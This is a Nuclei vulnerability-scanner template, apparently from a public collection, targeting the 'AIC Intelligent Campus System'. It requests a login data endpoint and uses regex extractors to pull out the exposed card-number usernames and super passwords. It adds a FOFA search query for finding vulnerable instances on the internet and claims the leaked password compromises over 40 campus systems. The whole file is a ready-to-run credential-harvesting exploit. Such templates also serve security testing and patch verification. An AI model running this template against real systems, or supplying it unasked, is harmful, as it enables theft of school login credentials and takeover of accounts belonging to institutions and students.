http:
    - extractors:
        - group: 1
          name: username
          part: body
          regex:
            - '"卡号":"(.*?)"'
          type: regex
        - group: 1
          name: passwd
          part: body
          regex:
            - '"密码":"(.*?)"'
          type: regex
      matchers:
        - condition: and
          dsl:
            - status_code == 200 && contains(body_1,"卡号\":\"") && contains(body_1,"密码\":\"")
          type: dsl
      method: GET
      path:
        - '{{BaseURL}}/datacenter/dataOrigin.ashx?c=login'
id: aic-intelligent-password-exposure
info:
    author: SleepingBag945
    description: |
        Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br>
    metadata:
        fofa-query: title="AIC智能校园系统"
        max-request: 1
    name: AIC Intelligent Campus System - Password Exposure
    severity: medium
    tags:
        - aic
        - exposure
        - password
        - AIC智能校园系统
